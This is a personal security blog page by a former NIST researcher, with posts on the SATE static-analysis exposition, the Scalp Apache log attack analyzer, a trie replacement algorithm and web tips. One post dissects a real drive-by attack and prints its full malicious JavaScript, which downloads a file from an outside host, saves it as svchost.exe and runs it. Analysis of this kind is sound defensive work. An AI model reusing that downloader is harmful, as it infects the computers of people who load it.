I <3 Bots!
Subscribe to the RSS feed

Internet User Privacy Values Survey

I know how tough and crucial it is to get participants to a survey, so that would be great if you guys could take this and spread it a little bit more...

Researchers at ThePrivacyPlace.Org are conducting an online survey about privacy policies and user values. The survey is supported by an NSF ITR grant (National Science Foundation Information Technology Research) and was first offered in 2002. We are offering the survey again in 2008 to reveal how user values have changed over the intervening years. The survey results will help organizations ensure their website privacy practices are aligned with current consumer values.

The URL is: http://theprivacyplace.org/currentsurvey

We need to attract several thousand respondents, and would be most appreciative if you would consider helping us get the word out about the survey, which takes about 5 to 10 minutes to complete. The results will be made available via our project website (http://www.theprivacyplace.org/).

Prizes include $100 Amazon.com gift certificates sponsored by Intel Co. and gifts from IBM and Blue Cross and Blue Shield of North Carolina

On behalf of the research staff at ThePrivacyPlace.Org, thank you!

Last week at NIST

Every good things have an end... this is the time for me to leave NIST. So I will be a security consultant at Cigital, Inc..

I've been working at NIST for 2 years and a half as a Guest Researcher in the SAMATE Project. I originally came at NIST to do mostly statistical analysis or so, but it changed a lot! I started by building the SAMATE Reference Dataset website and this is how I started to learn about "security", but working with flawed source code. This was very obscure to me (I guess like everybody computer scientist specialized in applied mathematics) and I learned a lot about weaknesses, vulnerabilities, "how to find them?", scanners etc.

My first real security related work was about the Web Application Security Scanner Specification and then, design a way of testing the web apps scanners:

  • test suite with seeded vulnerabilities
  • checking the types of attacks
  • trying to explain the false-negative of the tools by a monitoring of what/where the scanner went in the application at a logical level, such as "did the tool logged in successfully? did it generate a couple of errors, did it try many times?

The goal of the 3 components based analysis is to really be able to understand what the tool is doing, if it didn't find a particular vulnerability, why?

One of the best moments I had at NIST was when we did the Static Analysis Tool Exposition. I was part of the organizers and from the beginning, it was a real challenge: choosing good test cases, criteria to evaluate the reports, etc. Of course, SATE 2008 was not perfect, we did many mistakes, but at least, we tried, we had some results and we learned a lot. I have good hopes for the next SATE, even though this is really challenging on many aspects:

  1. Not make people think/act like this is a competition (we sometimes see people claiming they won SATE 2008, but... well, there would be many things to say to them)
  2. Having a strong evaluation criteria (I guess this is challenging every time human assessment is part of the game)
  3. Solve the way to present data to the evaluators. We couldn't have the GUI of the tools etc. so our analysis (as an evaluator) was really limited and we sometimes had to guess what was the exact weakness report
  4. and finally, having more resources and help for evaluating the weaknesses reported by the tools (47k this year, one month to evaluate...)

Oh well, I will of course continue to follow what the SAMATE team is doing, even though I will be away and busy with other interesting stuff and I'm really looking forward to see the results of the current study we are running on the function-wise weakness characterization.

But for now, it's time for me to get some vacation, going back to France for almost one month, getting my worker visa etc.

Scalp 0.4: apache log based attack analyzer, updated

Some time ago, I released a first version of a tool named Scalp. The tool analyzed the Apache HTTPD logs in order to examine if there were attacks or not. The attack detection is based on the rules provided by the PHP-IDS project.

Today, I took time to finalize a bit more the Python version of Scalp. The version 0.4 can now be downloaded on the project web page.

This version includes a couple of features such as:

  • Output in HTML, XML or TEXT format
  • Specify the output directory
  • Using a random sample for scanning the log file
  • Trying to decode the potential attack vectors
  • Returning the lines that couldn't be examined

And then, with some other options that already existed in the previous versions,

  • Select a time frame
  • Select classes of potential attacks

the tool seems to approach a final version.

I won't add more into it since I want to keep it simple and quite fast (I may add optimization if I find some). Also, the C++ version is on its way and mostly done with same amount of options, the code is checkable using the google repository, but I still have to work on options and time-frame specification.

Scalp 0.4:

PyQt and WebKit integration: unexpected limitation [fixed]

For the one that don't know Qt, this is a huge and mature framework for developing GUI & more on different platform (to read, multi-platform). I already did some development using Qt and C++ (especially when I was working at the GERAD).

As, with Marcin, we wanted to have a look at some technologies that involved a browser etc. I decided to look at Qt and the almost-fresh WebKit integration.

The integration of WebKit in a framework like Qt, allows the developer to embed supposedly in a easy manner a browser that supports the basic web technologies which are HTML, CSS and JavaScript (it seems that Flash is going to be supported soon, and anyway, one can write its own plugin in order to interact with some specific content) in its application.

And indeed it is easy... I used PyQt in order to develop a very simple prototype and see what we are able to do with this new technology. As I know already Python and Qt, it was easy to me to start and be kinda effective. So, in few hours of work, documentation reading and trying to understand why and how the Python version of Qt was using such or such thing compared to the C++ version, I got this workable browser that allows dynamic JavaScript injection through a console, view the source and a simple encoding converter (click on the image to see the full screen-shot):



At this point, I was actually very excited, less than 500 lines of Python in order to create that... was kinda worth few days of work in order to create a useful tool: the Swiss Army Knife of the Pen-Test.

My next and logic step was to extend the current tool in order to have the tamper-data like capabilities (eg. being able to hijack the HTTP request and then tampering the GET/POST data).

And here come the problems... it's apparently not possible to get the current request then reply when using the WebKit widget in Qt (QWebView). I tried to use a delegate QNetworkAccessManager in order to overload the POST/GET request since this object is use to set the proxies etc. but nothing... I think they just didn't open this possibility for some reason.

Oh well, I then stop developing this prototype and will try to contact Qt experts/developers just to figure out if there is no other way to do it. I thought of a solution which would be to have my own HTTP manager using QHttp in order to do the request, get the response etc. and then sending the content to the browser; this would be great in a webapps scanner, but for the use that I wanted with, that would create huge limitation for the user-interaction and especially for Ajax applications. So, the prototype stays here until I find a solution or Qt open their network management under the QWebView widget...


Fixed:

An update to let you know that I actually fixed the problem, it was really stupid from me, but I should really care when the method are virtual or not before overloading it or not :/ shame on me!

So now, I am able to have a firefox/tamper-data/firebug in one tool :)

How fair should Google Search be?

This is the question that is raising in my mind right now... If you search for "Chrome" with the Google search engine, you will find their browser in the third position. Okay, it's not the first one, but i'm just wondering how possible is it for the brand-new-shiny-buggy browser to be that well referenced in a "classical" manner.

Of course, this is under the google.com domain which (the main page) is PageRank 10, but well, I'm really wondering if this was a natural process or if something happened. First of, we can see that, using the search engine, the related pages of google.com/chrome are the different search engines... How come? Shouldn't it be more like Mozilla, Opera... Microsoft IE... ? For instance, if I look for the related pages of yahoo.com/finance I will find financial websites such as NASDAQ, etc.

Anyway, if Google can control their search engine like that (and of course it's easy for them to do so...), what is the impact on the fairness of their search engine? The PR seems to be okay as long as there is not business like interference in the process...

And so you wanted to protect your email address on your website...

People start thinking of how to prevent spam when they're building website, that's a fact and that's very good indeed. The only problem is when they don't actually know how a bot would handle the HTML page...

For instance, I was surfing on qik.com and saw this little piece of JavaScript in order to protect the exposure of the email address:

<script type="text/javascript">
//<![CDATA[
  document.write('<a href="mailto:XXXX@qik.com"\
    title="Send us an email!">XXXX@qik.com<\/a>');
//]]>
</script>

As the readers of this blog may know, the bot process is really easy.... download the HTML page (crawling) and then trying to extract the email address (parsing). This is just obvious that a bot wouldn't bother with the CDATA tag or because this is embedded in a JavaScript code, if I would have to do a bot, nonetheless I would have a very lossy parsing in order to gather as much information as possible, but I wouldn't care about "in which context am I?". Also, according to some testing I'm doing, I can tell you have if this was a URL, the Google bots would get them...

So please, obfuscate just a bit this... some example can be found on fuckthespam.com

Why the "line of code" is indeed a good metric

When I first learned about source code metrics, I was amazed about people using the line of code for doing comparison with software. It was for me a lack of imagination.

At the beginning of the week, I started a small and fast experiment: extracting metrics from the SATE 2008 test cases. This experiment focuses on function-wise properties and therefore, I have to extract for each functions a couple of metrics:

  • McCabe's cyclomatic complexity which computes the code complexity, this is indeed a good metric to estimate the difficulty that a human will have to understand a given piece of code (very important for security related problems)
  • Line of Code
  • Line of Comments
  • Number of local variables
  • Number of parameters (which represents the coercion between the function and the whole program)
  • Number of function call
  • Number of function that are ``sources''
  • Number of function that are ``sinks''
  • Number of C standards functions (obviously, only for C test cases)

At first the the line of code was implemented cause it's an easy one to compute and it also gives an important value if we want to normalize the other metrics. We also decided to introduce the number of ``source/sinks'' for studying input validation weaknesses later on...

Anyway, after running some statistics on the output results, I was amazed by observing that the Pearson correlation coefficient between McCabe and Line of Code was never less than 0.90 (which could be compare to 90% as a correlation rate) (but I have to say that there is huge limitations in the parsers we are using for extracting information, for instance, the C is not pre-processed etc.). This result is only valid for C test cases, actually, the average of observed correlation in Java test case is around 0.60...

Of course further statistical analysis will be necessary to conclude anything on this subject, but if we were unlucky with the test cases selection, this may have been a source of the problem, but I don't think we were. Actually, this seems quite logical to think that these metrics a related, the longer the code is, the more complex in term of tests, loops etc. it can be, there is indeed more chance that a longer code contains more cycles :)

Oh well, I'll keep writing about especially since I expect to get results pretty soon...

Trie based fast and massive replacement (Algorithm)

While working on the C++ version of scalp, I had to do massive simple transformations of a given text, ie. replacements of words by others.

Since the main way to do this (a loop which does a replacement at the time), is very inefficient, I decided to find something faster. I then came up with a tree based replacement algorithm; I believe this is kinda famous but I never heard about such algorithm, it basically uses a non compact trie in order to have an efficient search of the current word.

The main algorithm is very simple and similar to a state machine where the state depends on the next character in the trie. For example, if we want to to replace the words: "ba", "me", "mp" in a text, the trie will be this following one:

The idea is then to iterate over all the characters in the text, and for each letter determines whether this is a possible word to replace or not (simply by looking if the letter is a child of the trie root). Then, we iterate over the next letters in the text in order to see if the sequence of letters are an actual word to replace or not (every time, the same methodology is used: look in the children at the current state of our iterator in the trie).

This algorithm seems more efficient than the simple replace used in a loop since we will perform a descent in a tree and therefore replace a linear search by a logarithm one.


I ran a little statistical comparison between two algorithms: mine and the simple loop one. The test bed is quite simple and uses randomly generated text which contains the words to replace with a certain density. In order to create statistics, I made all the sizes varying and I aggregated the results from the same dictionary size. So, for a given size of a dictionary (let's say, 200 words to replace), a text has been generated with a density that vary from 0.1 to 0.5 (from 10% to 50% of the words in the text will be words to replace) and finally, the size of the text vary from 25 to 200 words (and words are randomly generated to be from a size 5 to 32).
As I said previously, the results from a same dictionary size has been aggregated since I've seen practically that the result mainly depends on the dictionnary size (it also obviously depends on the size of the text, but as this is a constant for the 2 algorithm, I can compute the mean of the different data to extract the average gain for a particular dictionary size).

Finally, here is the curve that shows the logarithm progress of the gain compared to the classical method):

The reference replace implementation which has been compared to the one I developed is the following (STL/C++ implementation):

void str_replace(string& where, const string& what, const string& by) {
  for (string::size_type i  = where.find(what);
                                 i != string::npos;
                                 i  = where.find(what, i + by.size()))
    where.replace(i, what.size(), by);
}
and has been used M times (M is the size of the dictionary).
I also decided to release a very-early version of this replace algorithm (which is not template yet): stree.h which use the great STL friendly tree structure from Kasper Peeters.

As for data information, the here is the code I used to generate the dictionary, and text with a certain density: genRandData.cpp

A morning at work: Content-Disposition blocked!

A morning, I woke up, and all the websites using a download system didn't work anymore. Yeah this is what I've seen. I guess I don't need to tell you that it was such a pain and that all the downloading systems on the different websites we have were not working anymore.

Such a big stress thinking that everything is broken at first, then after some time, realized that the problem is about the Content-Disposition header field which is dropped.

I wouldn't say that I would like to thank the admin that do no tell people about the modification... Anyway, I guess this is every time like that?

The Content-Disposition HTTP header field is used to explain to the browser how the data are presented. I basically use it in order to force a download system using such php script:

<?php
  // download.php
  // some checks on the $fname, variable to be sure
  // it exists and is in the allowed directories...
  header("Pragma: public");
  header("Expires: 0");
  header("Cache-Control: must-revalidate, pre-check=0");
  header("Content-Type: application/octet-stream");
  header("Content-Length: " . filesize($fname));
  header("Content-Disposition: attachment; filename=".basename($fname));
  header("Content-Description: File Transfer");
  @readfile($fname);
  exit;
?>

Now, if you cannot submit the Content-Disposition field, then the browser will download the file called "download.php". A quite simple solution, is to fool the browser by making the name of the reachable URI the same as the file it should download, using Mod_Rewrite.

RewriteEngine On
RewriteBase /mydir
RewriteRule   ^download/([^/]+)$ /mydir/download.php?file_redir=$1

And just a simple modification in the original script in order to detect the "file" GET variable. But since we don't want to modify all the (generated or not) HTML files, we need to make the redirection automatically.

<?php
// download.php
// some checks on the $fname, variable to be sure
// it exists and is in the allowed directories...
if (isset($_GET['file_redir'])) {
  $fname = $_GET['file_redir'];
  // checks for good files (careful of directory traversal etc.)
  header("Pragma: public");
  header("Expires: 0");
  header("Cache-Control: must-revalidate, pre-check=0");
  header("Content-Type: application/octet-stream");
  header("Content-Length: " . filesize($fname));
  header("Content-Description: File Transfer");
  @readfile($fname);
  exit;
}
else {
  header("Location: /mydir/download/$fname");
  exit;
}
?>

Then you don't have to change all your pages. This is of course a (not so?) temporary solution since the server will do extra work in order to go to the same state, the download of the file, but well, it does the job to fool the browser...

Scalp: apache log based attack analyzer

I started a project some time ago in order to parse some apache log file, to detect some attacks etc. The attack recognition is based on the PHP-IDS filters.

The first release version is written in Python http://code.google.com/p/apache-scalp/downloads/list but I started (well, almost finished) a faster multi-threaded/C++ version in order to be able to handle bigger log files.

The main project page is reachable here: http://code.google.com/p/apache-scalp

Scalp the apache log! - http://code.google.com/p/apache-scalp
usage:  ./scalp.py [--log|-l log_file] [--filters|-f filter_file]
                   [--period time-frame] [OPTIONS] [--attack a1,a2,..,an]
   --log       |-l:  the apache log file './access_log' by default
   --filters   |-f:  the filter file     './default_filter.xml' by default
   --exhaustive|-e:  will report all type of attacks detected and not stop
                     at the first found
   --period    |-p:  the period must be specified in the same format as in
                     the Apache logs using * as wild-card
                     ex: 04/Apr/2008:15:45;*/Mai/2008
                     if not specified at the end, the max or min are taken
   --html      |-h:  generate an HTML output
   --xml       |-x:  generate an XML output
   --text      |-t:  generate a simple text output (default)
   --except    |-c:  generate a file that contains the non examined logs due 
                     to the main regular expression; ill-formed Apache log etc.
   --attack    |-a:  specify the list of attacks to look for
                     list: xss, sqli, csrf, dos, dt, spam, id, ref, lfi
                     the list of attacks should not contains spaces and be comma
                     separated
                     ex: xss,sqli,lfi,ref

My talk at SAW: Automated Evaluation of source code analyzer output

It has been some time since I haven't post on my blog... well, I've been busy especially with the end of SATE, and oh well! had vacation :)

Anyway, at the next Static Analysis Workshop this Thursday, we're gonna talk about the SATE experiment and the observations/results we could get from this. I am then gonna talk about a tool I wrote in order to probe if a reported weakness is a false-positive: this is the Automated Evaluation.

The main idea of the Automated Evaluation, is to get some information on the source code and, under some assumptions, try to make a conclusion on the correctness of the piece of code. Behind all the reasoning from that particular tool, my approach had to be radically different than a classical SCA otherwise this would have been like creating a new SCA and this would have been obviously useless. The context of this automated evaluation is limited to the buffer overflows and this can only work for proving false-positive only!

So basically, I am reading the source code from the reported sink to the possibles sources and grabbing the actions that possibly affect the variable which have a role in the code.

These actions are like:

  • Allocation of a destination buffer
  • Computing the size of the source buffer(s)
  • Test for NULL
  • Test that involves the size of the buffers...
  • ... and some others

Then, once these actions are detected, the tool increments a global score of false-positiveness to this reported weakness. We then only have to set a threshold in order to know what correctness we want to have; this is really tied to the source code and how the program is developed.

Even though this evaluation method is not perfect, this was adapted to the C test cases we had in SATE 2008 since the global code quality was good. We can even say that the software were well written; it was then okay to make some assumption on the code such as:

  • If the size of the destination buffer is computed with the size of the source buffer, the size is good (basically: no off-by-one)

Also, the tool itself needs some information on the source code such since it uses regular expression to match the "actions"...



Here we are for a quick explanation and here are the slides: SAW: Automated Evaluation of SCA output

ph34r the script kiddies: Whitehouse.org

I was just reading this news (reported by Kanedaa), decided to look closer to the content of this "malware" stuff to see if there was some nice techniques behind this so called "attack".

Oh men! How disappointing to see that this was done by script kiddies... the "obfuscation" consist of 3 levels of URL encoded javascript... yeah... URL encoding is for sure an obfuscation very hard to prettify. And the final code was just not obfuscated either... Just this:

function myCreateOB(o, n) {
    var r = null;
    try { eval('r = o.CreateObject(n)') }catch(e){}
    if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){} }
    if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject(n)') }catch(e){}  }
    return(r);
}

function Go(a) {
    var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll");
    var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am");
    var e = s.Environment("Process");
    var xml = null;
     var url = 'http://ad.ox88.info/bbs.jpg';
    var bin = e.Item("TEMP") + "svchost.exe";
    var dat;
    try { xml=new XMLHttpRequest(); }
    catch(e) {
        try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); }
        catch(e) {
            xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
        }
    }
    if (! xml) return(0);
    xml.open("GET", url, false)
    xml.send(null);
    dat = xml.responseBody;

    o.Type = 1;
    o.Mode = 3;
    o.Open();
    o.Write(dat);
    o.SaveToFile(bin, 2);

    s.Run(bin,0);
}

function mywoewd() {
    var i = 0;
    var ss11='{7F5B7F';
    var ss12='63-F06';
    var ss13='F-4331-8A';
    var ss14='26-339E0'
    var ss15='3C0AE3D}';
    var ss1=ss11+ss12+ss13+ss14+ss15
    var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}";
    var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}";
    var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}";
    var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}";

    var t = new Array(ss1,ss2,ss3,ss4,ss5,null);
    while (t[i]) {
        var a = null;
        if (t[i].substring(0,1) == '{') {
         a = document.createElement("object");
         a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
        } else {
            try { a = new ActiveXObject(t[i]); } catch(e){}
        }
        if (a) {
            try {
                var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell");
                if (b) {
                    Go(a);
                    return(0);
                }
            } catch(e){}
        }
        i++;
    }
}

As reported by Trend Micro, this is supposed to be a download of the trojan: TROJ_DELF.GKP ... that doesn't mean anything to me but anyway, my AV didn't detect it :)

Yet another study on code quality: A Tale of Four Kernels

If like me you are interested in code quality and some general conclusion that one can draw based on code quality studies, I really recommend to read this paper: A Tale of Four Kernels by Diomidis Spinellis, ICSE '08: Proceedings of the 30th International Conference on Software Engineering

I just want to quote a part of the conclusion by the author

Therefore, the most we can read from the overall balance of marks is that open source development approaches do not produce software of markedly higher quality than proprietary software development.

The only problem with this statement is that it is based on the fact that the metrics he used were not weighted for their importance for the "Code Quality" (if this means something). Therefore, the comparison between the Windows research kernel and Linux seems a little bit awkward to me. Anyway, this is a very interesting paper about code quality, and lots of interesting ideas from the author of CScout.

Static Analysis Tool Exposition is over

Yeah, that's sad and also a relief: SATE is over. We actually released today the last stage of the evaluation (basically, the evaluation with some correction based on comments from the participants). Even though I would have prefer to have more feedback from participants on our evaluation, especially to increase its quality, I still think SATE is a good thing and will be an interesting resource for lost of researchers. This is, as far as I know, the only exhaustive resource on the subject (wild source code + weaknesses).

What do I want to do, see next? Since we have accumulated lots of data with the tool reports (raw weaknesses), the evaluations (I really want to thank MITRE's guys, especially Steve Christey and Bob Schmeichel for their help), I'm looking forward to do data analysis and trying to extract some limited results on it.

Anyway, this was overall a good experience, I actually did my first real code review mostly on lighttpd, dspace, mvnform and naim, I think I know way more on how detecting vulnerabilities, I also have been asking myself about how to rate vulnerabilities such as Cross-Site Scripting (hopefully, I will release the little document I wrote about it), I learned so much about how people are writing code trying to understand the design, the code etc. in the applications.

Also, hopefully, I will be able to release the website I developed to handle the weaknesses from different tools. It is, I think, interesting if you are working with more than one assessor. You can send evaluation, comments, merging the weaknesses etc. with a web interface. Even though it needs improvements (it has been done in less than 2 weeks) I think this would be an interesting piece of software for people who are dealing with tons of weaknesses. Another interesting point is that we (at NIST) may open that website for everybody in order to make new evaluation in order to increase the quality of the data we currently have.

Oh well, it seems like a journey is really close to its end, it was such a good time sometimes, and some other time such consuming work. We've been dealing with fifty thousands of weaknesses, dozen of tool reports, and almost tens of test cases... I will keep you posted about the next decision we are gonna make with SATE and hope that lots of people will find in this "exposition" the most they could get.

Oh please stop it with these ridiculous CAPTCHAs!

Marcin just told me about that stupid CAPTCHA from the rapidshare website. Even if I think this is made explicitly to annoy people (this CAPTCHA is used only for free accounts) this is just stupid.

Can you really tell which letter has cat or not? I'm sorry but I can't!

Accelerate the convergence to the bug: Running the test in 16-bit

Yesterday, I came across a case in a piece of software which was really hard for me to understand perfectly. Not only the code is well written (which is always worse for finding bugs :)) but the structure is also well thought (this is the implementation of an associated array in C in the lighttpd application).

The problem I had was to state whether a tool report was a true-positive/false-positive. So, as in many case I've seen in this software a problem may occur only in the limit cases. This one may occur after INT_MAX insertion in the structure. I don't know if one of you ever tried to do such a thing, but only INT_MAX (~2 billions on typical PC) allocations is a lot, so inserting elements in a structure that needs at least 5 (re)allocations is too much. But well, I did it. Also, I ran this test with valgrind using the memory leak check (full check and high definition).

I then ran a simple test program to fill this structure in a real condition: a typical x86/32-bit architecture. As I knew it was stupid and didn't even think this could end before 2 days I started looking in other direction in order to reduce the INT_MAX size for having a reasonable time execution of the test.


My first attempt is to shift all the types that are used, I knew this was not perfect because even if I can force my program to use unsigned short instead of size_t, I wouldn't change the size of the pointers, a char * would still b 32-bit (there may be some options in gcc to control the size of the pointers — which I doubt — but I didn't find any). Using this methodology, I was able to make the program crash in the way that would have been a real true-positive.


But as I knew it was not good since the size of the pointers are not modified and I had the feeling that in that particular structure, the case of the possible crash is handled by itself (due to pointer and type limits), I started looking in other direction for running that program in 16-bit, a pseudo-real-16-bit-mode. I then started looking into emulators and how to compile code for 16-bits and running it on my linux (x86/32-bit). After having issues compiling and running the test program with the gnu-m68hc11 ELF package, I found the bcc/elksemu stuff. After compiling and running with ELKS utilities, the test program didn't crash, it only failed in an assertion test after an allocation...


Different behavior, with different methods, okay... which is the correct one? Is it a problem of pointer size that made the test running differently than the real program on a 32-bit or maybe a limitation of the elksemu machine? As this morning I checked the state of the 32-bit run I launched yesterday, and this was finished... ended by a failed assertion.

As expected, pointer size matters when you wanna test on intrinsic limitations of a structure and its behavior using limit cases.

Scaling MySQL db

I've just came across this interesting blog entry; some numbers on how people (large websites companies) are actually using MySQL.

http://venublog.com/2008/04/16/notes-from-scaling-mysql-up-or-out/

MySQL table/field names

Sometimes I really don't understand developers.

Why the heck a table name such as a<script>foo(42)`cool could ever be allowed? What's the point of that? I know I am almost clueless with SQL but... what's the reason here? If someone has some idea, I would love to hear them!

Untrusted websites passwords

After using different password, it's really bothering to have lots of diversity; you need to remember them or well, store them in a password.txt

I just made a simple script for my own in order, from mostly the same password, to generate different ones for different websites... This is not that big deal, just a simple script to do that, but I thought it could have been useful for some of you...

You can reach the script here: Untrusted websites passwords creator

NIST SATE step 3 completed: test cases information release

This evening at work, with Vadim, we were exhausted after days of work but we were smiling. Smiling and happy because we knew that the step 3 of SATE was pretty much done. The step 3 is when all the participants are sending their output to us. Even if we know that we will have hard time to come up with the master reference list for each test cases what we selected for SATE 2008, we know that this is interesting data for the SwA community and especially SCA studies.

Today, we can finally tell which test cases were selected by us for SATE 2008. First of all, we have 2 different tracks: C language and Java language. For the java track, we decided to look more into web applications. We then have:

And for the C track we selected:

  • Nagios: host, service and network monitoring with web interface (using CGI)
  • Lighttpd: web server
  • Naim: console instant messenger

You may have lots of comments on why these and I am totally ready to answer your questions. Just to let you know, during the selection phase, we reviewed 50+ different applications. For each applications, we had to scan them using tools, doing some manual review and our main goal is to find at least one exploitable vulnerability. Concerning the type of test cases themselves, the constrain is to have real exploitable vulnerabilities and they must be real applications which means basically, not test cases that we have in our SRD.

Just as reminder, the next important dates for SATE 2008 are:

  • April 15, we are distributing to the participants our master reference list, the list of real weaknesses found by the participants
  • June, comparison of all the participants results, the participants get all the reports submitted at SATE 2008
  • December, all the data and reports are public

- page 1 of 7

I <3 Bots!